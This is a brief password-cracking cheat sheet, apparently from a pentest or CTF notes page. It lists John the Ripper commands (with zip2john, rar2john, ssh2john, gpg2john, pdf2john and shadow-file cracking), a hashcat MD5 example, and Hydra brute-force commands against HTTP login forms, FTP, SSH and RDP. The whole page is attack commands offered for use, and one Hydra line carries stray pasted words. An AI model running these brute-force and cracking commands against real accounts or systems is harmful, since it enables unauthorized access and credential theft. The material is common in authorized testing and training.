Cracking

John the Ripper

Base Use:

john --wordlist=rockyou.txt hash.txt

Zip File

zip2john file1.zip>hash.txt

Rar file

rar2john file1.rar > hash.txt

gpg password

gpg2john file1.priv > hash.txt

Shadow file

unshadow passwd shadow
john --wordlist=rockyou.txt --format=sha512crypt unshadowed.txt

SSH key password

ssh2john id_rsa > hash.txt

NTLM Cracking

john --wordlist=rockyou.txt hash.txt --format=NT

PDF password

pdf2john file.pdf > hash.txt

Hashcat

hashcat -m 0 7d98afcbd8a6c5b8c2dfb07bcbe29d34 /root/rockyou.txt --force

Hydra

HTTP Basic Auth

hydra -l admin -P dict/rockyou.txt http://10.10.10.10/ [-s 443] http[s]-get /private/

HTTP Post Form

hydra -l admin -P dict/rockyou.txt 10.10.10.10 [-s 443] http[s]-post-form Hash/Password Crack post-form "/login.php:username=admin&password=^PASS^&login=Login:F=Incorrect username or password" -V

FTP

hydra -t 1 -l admin -P dict/rockyou.txt -vV 10.10.10.10 ftp

SSH

hydra -l user -P dict/rockyou.txt ssh://10.10.10.10:22 -t 4

RDP

hydra -t 1 -V -f -l administrator -P dict/rockyou.txt rdp://10.10.10.10

Last updated